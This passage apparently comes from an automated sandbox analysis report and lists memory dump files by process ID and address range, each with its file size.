                                                                                                                                                                                                                                                                              • memory/3852-254-0x0000000001E20000-0x0000000001E3D000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                116KB

                                                                                                                                                                                                                                                                              • memory/3852-258-0x0000000004AD2000-0x0000000004AD3000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                              • memory/3852-255-0x0000000000230000-0x0000000000260000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                192KB

                                                                                                                                                                                                                                                                              • memory/3852-252-0x0000000000560000-0x000000000057E000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                120KB

                                                                                                                                                                                                                                                                              • memory/3852-257-0x0000000004AD1000-0x0000000004AD2000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                              • memory/3852-256-0x0000000000400000-0x0000000000468000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                416KB

                                                                                                                                                                                                                                                                              • memory/3852-259-0x0000000004AD3000-0x0000000004AD4000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                              • memory/3852-260-0x0000000004AD4000-0x0000000004AD6000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                8KB

                                                                                                                                                                                                                                                                              • memory/5840-294-0x0000000000090000-0x0000000000095000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                20KB

                                                                                                                                                                                                                                                                              • memory/5840-295-0x0000000000080000-0x0000000000089000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                36KB

                                                                                                                                                                                                                                                                              • memory/6696-297-0x0000000000070000-0x0000000000076000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                24KB

                                                                                                                                                                                                                                                                              • memory/6696-298-0x0000000000060000-0x000000000006C000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                48KB

                                                                                                                                                                                                                                                                              • memory/7612-308-0x00000000000D0000-0x00000000000D4000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                16KB

                                                                                                                                                                                                                                                                              • memory/7648-303-0x0000000000160000-0x0000000000161000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                              • memory/7684-309-0x0000000000AD0000-0x0000000000AD1000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                              • memory/7712-306-0x0000000000200000-0x0000000000201000-memory.dmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                4KB